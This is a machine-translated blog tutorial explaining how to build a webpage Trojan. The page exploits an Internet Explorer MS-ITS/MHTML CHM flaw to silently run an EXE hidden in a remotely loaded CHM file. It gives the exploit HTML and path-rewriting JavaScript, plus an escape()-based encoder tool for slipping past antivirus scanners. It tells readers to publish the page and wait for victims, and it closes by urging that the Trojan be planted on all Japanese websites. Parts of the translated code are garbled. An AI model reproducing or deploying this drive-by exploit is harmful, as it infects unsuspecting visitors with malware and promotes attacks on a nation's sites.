Creating the ultimate webpage Trojan is worth reading!

Creating the ultimate webpage Trojan is worth reading!

If you open this page and see a window similar to the following, I will "congratulations" you have a "hole" ^ o ^

Please note: This article was published in March July. So far, the trojan described in this article has been successfully killed by all anti-virus software. In addition, Microsoft has released patches for this vulnerability in various OS versions, so this trojan has basically failed. Please do not try again. The purpose of this article is to provide a learning test for interested users.

This vulnerability has not been detected for a day or two. Microsoft and some security organizations have not published this vulnerability due to user security and other factors, it is only recently discovered that there are more and more web pages that use this vulnerability to bundle Trojans. Then, the Computer Emergency Readiness Team (CERT) the latest Microsoft Internet Explorer vulnerability has been officially announced. Currently, there is no complete solution for this vulnerability, even if a user takes some protection measures, the risk caused by the vulnerability cannot be completely avoided. By exploiting this vulnerability, intruders can trick IE's InfoTech Storage (ITS) protocol processor into obtaining scripts from other domains and obtaining the same permissions as the local region on the target computer. CERT pointed out that intruders can execute the above script by using a special URL address when accessing a website, so as to obtain credit card information from others or even paralyze the entire network. The working principle of this vulnerability is as follows: IE identifies an inaccessible or nonexistent MHTML file through its or MHTML protocol; When IE does not find any Compiled HTML Help File (CHM) the ITS protocol processor may be spoofed to access CHM files from other domains. At this time, intruders can carefully design the CHM File to include scripts that can be executed from other domains, so that the cross-domain security mode will be broken by intruders.

If you have less time to talk about it, go to the topic immediately. It is very simple to implement. I believe that anyone who understands HTML can implement it manually.

Step 1: Write a webpage that can automatically run the EXE file. The file content is very simple, as follows:

<Body onmouseup = document. selection. empty () oncontextmenu = "Return false" onselectstart = "Return false" ondragstart = "Return false" onbeforecopy = "Return false" oncopy = document. selection. empty () onselect = document. selection. empty ()> <Object ID = Runit codebasepoliciepack.exe type = application/X-oleobject Height = 0 width = 0 Object>

Some access control is implemented in the body tag, which shields the mouse from selection, right-click shielding, Drag and Drop shielding, and prevents copy. The second tag is the load EXE code. Load a binary file using the object tag. Note that the type here is "application/X-oleobject ", the above Code adds an execution file named "iepack.exe" to the object. If you open this HTML file directly, you will find that the EXE file is also magically running, smart, have you seen something?

Step 2: Save the above Code as a file, tentatively set to "chm.html", and put the EXE file and webpage set in the object tag in the same directory. Do not think it will run in this way. ie will not actively download the execution files on the server. Of course there are some solutions. You can find a CHM production tool. After you break this page into the CHM file together with the EXE file and open the CHM file, you will find that the EXE runs the same way. Here I recommend easychm for ease of use .??~! @ # $ % ^ Search your dog.

Step 3: This step is the most critical, and this is where the vulnerability is to be exploited!

Create an htmfile mm.htm and write the following code:

<Body onmouseup = document. selection. empty () oncontextmenu = "Return false" onselectstart = "Return false" ondragstart = "Return false" onbeforecopy = "Return false" oncopy = document. selection. empty () onselect = document. selection. empty ()> <Textarea id = Code style = "display: none"> <Object Data = "MS-its: MHTML: file: // C:/Foo. MHT! $ {Path}/help. chm:/chm.html "type =" text/X-scriptlet "> </Object> </Textarea> <Script language = JavaScript> Document. Write (code. value. Replace (// $ {path}/g, location.href.substring(0,location.href.indexof('chm.html ')))); </SCRIPT> <Object type = "text/X-scriptlet" Data = "MS-its: MHTML: file: // C:/Foo. MHT! Http://duduwolf.winzheng.com/public/IEpack/help.chm::/chm.html & gt; </object & gt;

If you think it looks messy, we recommend that you copy the above Code to the HTM editor to view it, which is much easier. The first TAG body in the Code is the same as the previous one. The second is the textarea tag. Note that the tag contains an object tag, which uses the MS-its vulnerability of IE, the value of data is a string of file paths with the MS-its Protocol. The $ {path} is only used to hide your ears and ears. Then you can see the third tag, which is a Javascript script, the content of the script is to set the value in textarea (that is, the <object...> </Object>) to replace characters. The content to be replaced is all the characters before $ {path}. You may wonder why we should replace them here, can't I write it directly? Of course not !!
Because after IE is on this page, no one knows where it puts the local temporary file on this page. You don't know the location, of course, you can't run it ')) obtain the full path of the local temporary page. Location. href returns the full path File Name of the current page. Then, you can easily obtain the path by selecting "substring" and replacing it with "replace". Then, you can easily obtain the full path name of the CHM File. Oh, I forgot to mention that the key to this ie vulnerability is that the client (IE) will automatically download the CHM file on the server (sorry, how to forget the most critical technology ...).
Hosts file. For the "MS-its: MHTML: file: // C:/Foo. MHT!" That appears twice in the code! ", This is the specific format of MS-its. What does it mean? I haven't studied it yet. I will tell you when I know it :)

Step 4: Haha, your latest webpage Trojan is finished, but don't be too happy. According to my test results today, norton, Symantec, coffee, and rising (Other Anti-Virus products are not installed, but you don't know) can successfully intercept the webpage Trojan. You should not be discouraged, since I have written this article, there must be a solution. Anti-virus software is very simple to scan for a virus. It is to open the file in binary or text mode (script virus) and find the specific virus feature code, here I estimate that most anti-virus software looks for "MS-its: MHTML: file: // C:/Foo. MHT! "This line is related. I didn't perform any tests, so we try to avoid this string of code in the source code to avoid anti-virus software. There are many ways to avoid it. I use string encryption in JavaScript scripts. The encryption function is built in Javascript. The encryption function uses escape (SRC) and the decryption function uses Unescape (SRC). After the two functions are executed, the strings after encryption/Decryption are returned, here I will give you a ready-made one. Copy the following code into an HTM file and use IE to open it. The rest will be used by people on Earth without me! Publish the well-designed web page to the Internet, and wait for it to win the bid (is it too dark? A little cool? Why not? I didn't hear the crow say I was a hacker ...)

<! Doctype HTML public "-// W3C // dtd html 4.0 transitional // en"> <HTML> <Meta http-equiv = Content-Type content = "text/html; charset = gb2312"> <Link Href = "http://a0759.nease.net/images/css.css" type = text/CSS rel = stylesheet> <Script language = JavaScript> <! -- VaR I = 0; VaR Ie = (document. All )? 1:0; VaR NS = (document. layers )? 1:0; Function initstyleelements ()/* styles for buttons init */ { VaR c = Document. Pad; If (IE) { // C. Text. style. backgroundcolor = "# dddddd "; C. compileit. style. backgroundcolor = "# c0c0a8 "; C. compileit. style. cursor = "hand "; C. Select. style. backgroundcolor = "# c0c0a8 "; C. Select. style. cursor = "hand "; C. View. style. backgroundcolor = "# c0c0a8 "; C. View. style. cursor = "hand "; C. retur. style. backgroundcolor = "# c0c0a8 "; C. retur. style. cursor = "hand "; C. Clear. style. backgroundcolor = "# c0c0a8 "; C. Clear. style. cursor = "hand "; } Else return; } /* Buttons Enlightment of "Compilation" Panel */ Function lighton (what) { If (IE) What. style. backgroundcolor = '# e0e0d0 '; Else return; } Function focuson (what) { If (IE) What. style. backgroundcolor = '# ebebeb '; Else return; } Function lightout (what) { If (IE) What. style. backgroundcolor = '# c0c0a8 '; Else return; } Function focusoff (what) { If (IE) What. style. backgroundcolor = '# dddddd '; Else return; } /* Buttons Enlightment of "Compilation" Panel */ Function generate ()/* generation of "Compilation "*/ { Code = Document. Pad. Text. value; If (CODE) { Document. Pad. Text. value = 'generating encryption code. Please wait! '; SetTimeout ("compile ()", 1000 ); } Else alert ('Enter the source file Code ') } Function compile ()/* The "Compilation "*/ { Document. Pad. Text. value = ''; Compilation = escape (CODE ); Document. Pad. Text. value = "<SCRIPT>/n <! --/Ndocument. Write (Unescape (/"" + compilation + "/");/N // -->/n <// SCRIPT> "; I ++; Alert ("Page encrypted" + I + "times! "); } Function selectcode ()/* selecting "Compilation" for copying */ { If (document. Pad. Text. value. length> 0) { Document. Pad. Text. Focus (); Document. Pad. Text. Select (); } Else alert ('No text to select! ') } Function Preview ()/* preview for the "Compilation "*/ { If (document. Pad. Text. value. length> 0) { PR = Window. open ("", "preview", "scrollbars = 1, menubar = 1, status = 1, width = 700, Height = 320, Left = 50, Top = 110 "); Pr.doc ument. Write (document. Pad. Text. value ); } Else alert ('no pre-viewed text content! ') } Function uncompile ()/* decompiling a "Compilation "*/ { If (document. Pad. Text. value. length> 0) { Source = Unescape (document. Pad. Text. value ); Document. Pad. Text. value = "" + Source + ""; } Else alert ('You need to generate the encrypted code before you can retrieve the source code! ') } // --> </SCRIPT> <Script language = JavaScript type = text/JavaScript> <! -- Function mm_swapimgrestore () {// V3.0 VaR I, X, A = document. mm_sr; for (I = 0; A & I <. length & (x = A [I]) & X. osrc; I ++) X. src = x. osrc; } Function mm_preloadimages () {// V3.0 VaR d = document; if (D. Images) {If (! D. mm_p) D. mm_p = new array (); VaR I, j = D. mm_p.length, A = mm_preloadimages.arguments; for (I = 0; I <A. length; I ++) If (A [I]. indexof ("#")! = 0) {d. mm_p [J] = new image; D. mm_p [J ++]. src = A [I] ;}} } Function mm_findobj (n, d) {// v4.01 VaR P, I, X; If (! D) d = document; if (P = n. indexof ("? ")> 0 & parent. frames. Length ){ D=parent.frames[n.substring(p%1%].doc ument; n = n. substring (0, P );} If (! (X = d [N]) & D. All) x = D. All [N]; for (I = 0 ;! X & I <D. Forms. length; I ++) x = D. Forms [I] [N]; For (I = 0 ;! X & D. Layers & I <D. layers. length; I ++) xw.mm_findobj(n,d.layers+ I }.doc ument ); If (! X & D. getelementbyid) x = D. getelementbyid (n); Return X; } Function mm_swapimage () {// V3.0 VaR I, j = 0, x, A = mm_swapimage.arguments; document. mm_sr = new array; for (I = 0; I <(. length-2); I + = 3) If (x = mm_findobj (A [I])! = NULL) {document. mm_sr [J ++] = x; If (! X. osrc) X. osrc = x. SRC; X. src = A [I + 2];} } // --> </SCRIPT> <Meta content = "mshtml 6.00.2800.1106" name = generator> <Body text = #000000 bgcolor = # ffffff Onload = "mm_preloadimages ('../images/close.gif')"> <Table cellspacing = 0 cellpadding = 0 width = 500 align = center border = 0> <Tbody> <Tr> <TH> webpage code encryption and decryption tool </Th> </tr> <Tr> <TD> & Lt; HR width = "95%" noshade size = 1 & gt; </TD> </tr> <Tr> <TD> <Form name = pad method = post align = "center"> <textarea class = v9pt style = "width: 100%; Background-color: # ebebeb "name = text rows = 15 Cols = 100> </textarea> <Br> <input onmouseover = lighton (this) onclick = generate () onmouseout = lightout (this) type = button value = encryption code name = compileit> <Input onmouseover = lighton (this) onclick = selectcode () onmouseout = lightout (this) type = button value = all selected code name = SELECT> <Input onmouseover = lighton (this) onclick = Preview () onmouseout = lightout (this) type = button value = previewed Page name = View> <Input onmouseover = lighton (this) onclick = uncompile () onmouseout = lightout (this) type = button value = original code name = retur> <Input onmouseover = lighton (this) onmouseout = lightout (this) type = reset value = clear name = clear> </Form> </TD> </tr> <Tr> <TD align = middle> < Onmouseover = "mm_swapimage ('image2','', '.../../images/close.gif', 1 )" Onmouseout = mm_swapimgrestore () href = "javascript: window. Close ()"> Height = 18 src = "http://a0759.nease.net/images/Close-1.gif" width = 52 Border = 0 name = image2> </a> </TD> </tr> </tbody> </table> </body>

I forgot to explain the above Code. I also pulled it from the Internet. I forgot to thank the author for providing you with such a useful tool !! Another thing to note is that there are no restrictions on the number of encryption times. Click encryption once and then encrypt it again. If you don't bother, you just need to add a few more times, but this will affect the page resolution speed, when parsing a page, it is decrypted layer by layer, and several times is required. I encrypted it three times in the test program. I believe that people on Earth cannot understand it after encryption :)

Patch: at present, Microsoft has not provided a complete solution. To ensure security, we recommend that you manually modify the Registry to block this vulnerability:
Open the registry, go to the hkey_classes_root/protocols/handle primary key, rename the MS-its key on the line, for example: ms-its.bak, if you pop up a form as stated at the beginning of the article when you browse this page, you can directly click that button to achieve the same purpose.

Postscript:The purpose of this article is to let everyone know how the horrible webpage trojan was born and what was compiled by people, this trojan is also the result of careful research after I use the tool to open the source code layer by layer after poisoning. Finally, I recommend several tools for you to analyze webpages. The first one is myie2. His browser can still be justified. I'm praising that I have installed a third-party plug-in: viewpage. This plug-in is amazing, it can quickly display the page attributes, image resources, webpage source code, Flash, Link List, CSS, script, and so on of the current page. With this tool, you can quickly learn how to "refine" webpages. The second one to be recommended is the editplus text editor, which is too easy to use and really easy to use ..... The third is csdn. the "myspy" software written by aweay, the moderator of the BCB version, is to use it to view the source code of the CHM file. The recommended tools can be searched by dogs if needed.

Today is the Lugouqiao Incident day. Do not forget your national shame! Add this Trojan Horse to all websites in Japan...

Mail: duduwolf@hotmail.com
QQ: 977257
Http://duduwolf.winzheng.com
Http://blog.csdn.net/duduwolf

Duduwolf was written on the evening of January 1, July 7.